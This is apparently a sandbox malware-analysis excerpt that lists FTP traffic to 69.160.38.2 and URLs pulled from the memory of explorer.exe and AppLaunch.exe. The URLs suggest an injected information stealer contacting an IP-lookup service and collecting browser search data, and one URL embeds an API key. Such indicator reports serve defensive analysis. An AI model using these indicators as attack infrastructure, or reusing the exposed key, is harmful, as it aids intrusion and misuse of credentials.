                      Source: unknownFTP traffic detected: 69.160.38.2:21 -> 192.168.2.6:51497 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 21:09. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 21:09. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 21:09. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 21:09. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                      Source: explorer.exe, 00000002.00000000.2196495464.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2196495464.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: explorer.exe, 00000002.00000000.2196495464.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2196495464.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: explorer.exe, 00000002.00000000.2196495464.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2196495464.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                      Source: explorer.exe, 00000002.00000000.2196495464.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2196495464.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: explorer.exe, 00000002.00000000.2196495464.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                      Source: AppLaunch.exe, 0000000B.00000002.2625292710.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oen
                      Source: explorer.exe, 00000002.00000000.2193212740.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2195323423.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2195385347.0000000007B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyl
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/RestAPI/TreeObject1
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/RestAPI/TreeObject1Response
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/RestAPI/TreeObject1ResponseD
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/RestAPI/TreeObject2
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/RestAPI/TreeObject2Response
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/RestAPI/TreeObject2ResponseD
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/RestAPI/TreeObject3
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006D7D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.2626531999.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/RestAPI/TreeObject3Response
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/RestAPI/TreeObject3ResponseD
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: explorer.exe, 00000002.00000000.2196926681.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
                      Source: explorer.exe, 00000002.00000000.2198779085.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                      Source: AppLaunch.exe, 0000000B.00000002.2626531999.0000000006B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: explorer.exe, 00000002.00000000.2196495464.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                      Source: explorer.exe, 00000002.00000000.2196495464.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/I
                      Source: explorer.exe, 00000002.00000000.2196495464.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                      Source: explorer.exe, 00000002.00000000.2196495464.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2196495464.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                      Source: explorer.exe, 00000002.00000000.2196495464.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabS
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: explorer.exe, 00000002.00000000.2198779085.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com-
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                      Source: explorer.exe, 00000002.00000000.2194331935.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
